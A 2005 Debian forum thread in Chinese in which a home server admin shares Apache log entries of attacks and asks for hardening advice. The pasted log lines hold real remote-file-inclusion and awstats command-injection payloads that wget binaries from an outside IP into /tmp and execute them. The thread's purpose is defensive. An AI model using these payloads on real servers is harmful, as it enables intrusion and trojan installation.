摩托學園討論區

這是一個開放的園地,竭誠歡迎您的光臨!

跳到內容

關於系統安全性

這個版面主要討論 debian 在 server 端的應用問題, server 種類繁多..舉凡 Web Server 、 File Server、 DHCP Server..等等。

版主: 阿信

發表回覆

關於系統安全性

文章ronmi » 週四 12月 22, 2005 6:14 pm

我在家灌了一台debian做為nat以及個人站
最近這幾天我的ssh一直被try(大概是因為固定ip的關係吧)
我決定對ssh鎖ip
我把平常有可能會用到的ip及網段加到hosts.allow裡面
然後把hosts.deny加上一行sshd: ALL
嗯 auth.log安靜多了

再來是apache2的access.log,一堆這種東西
216.218.193.85 - - [22/Dec/2005:15:37:34 +0800] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

應該是在try看看我有沒有裝有漏洞的論壇什麼的
稍行看了一下,我的電腦似乎是沒事啦
他攻的東西主要有
php -- 把php.ini裡的allow_url_fopen關掉應該就沒問題了,有架xoop、phpbb這一類php程式的站要小心,尤其是
216.218.193.85 - - [22/Dec/2005:15:37:28 +0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\x01.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.211.145.58 - - [22/Dec/2005:10:35:37 +0800] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
202.67.159.45 - - [22/Dec/2005:06:16:48 +0800] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
202.67.159.45 - - [22/Dec/2005:06:16:49 +0800] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


awstat -- 這個我不太清楚是什麼,我用dpkg -S去找,我的電腦沒有。攻擊紀錄是像這樣
64.142.100.79 - - [22/Dec/2005:05:51:34 +0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
64.142.100.79 - - [22/Dec/2005:05:51:35 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


基本上都是用script來抓取遠端程式執行(也就是種木馬)
和大家分享一下,也請大家看看有沒有疏漏的地方能給小弟一點建議,謝謝
ronmi
懵懂的國中生
懵懂的國中生
 
文章: 103
註冊時間: 週一 12月 05, 2005 2:31 am
來自: Taiwan
回頂端

文章ronmi » 週二 12月 27, 2005 4:32 am

過了幾天相安無事的日子之後,又發生一件怪事
我本身是使用so-net的ADSL
我看了一下Apache的log,發現有正常使用我的網站的人,ip都是來自so-net或是我的學校,再不然就是估狗雅虎的bot
不是so-net的ip,幾乎都來看我的系統有沒有漏洞的= =|||
還沒找到問題癥結點或要用什麼方法查,有大大能給點建議嗎?
ronmi
懵懂的國中生
懵懂的國中生
 
文章: 103
註冊時間: 週一 12月 05, 2005 2:31 am
來自: Taiwan
回頂端

文章訪客 » 週二 12月 27, 2005 8:28 am

awstat 是一個用來分析 apache 記錄檔 access.log 的自由軟體
支援中文,是一種 web 式的軟體,非常好用
可以到它的網站看 demo 效果:
http://awstats.sourceforge.net/

awstat 在某個版本之前 (忘記是那個版本)
被證實有嚴重漏洞可供入侵取得網站控制權
不過最新版應該沒問題了

用 hosts.allow /deny 並不是一個好方法
要學習使用 iptables 架構自己的防火牆
訪客
 
回頂端
發表回覆

回到 debian server

誰在線上

正在瀏覽這個版面的使用者:沒有註冊會員 和 1 位訪客

POWERED_BY
正體中文語系由 竹貓星球 維護製作
cron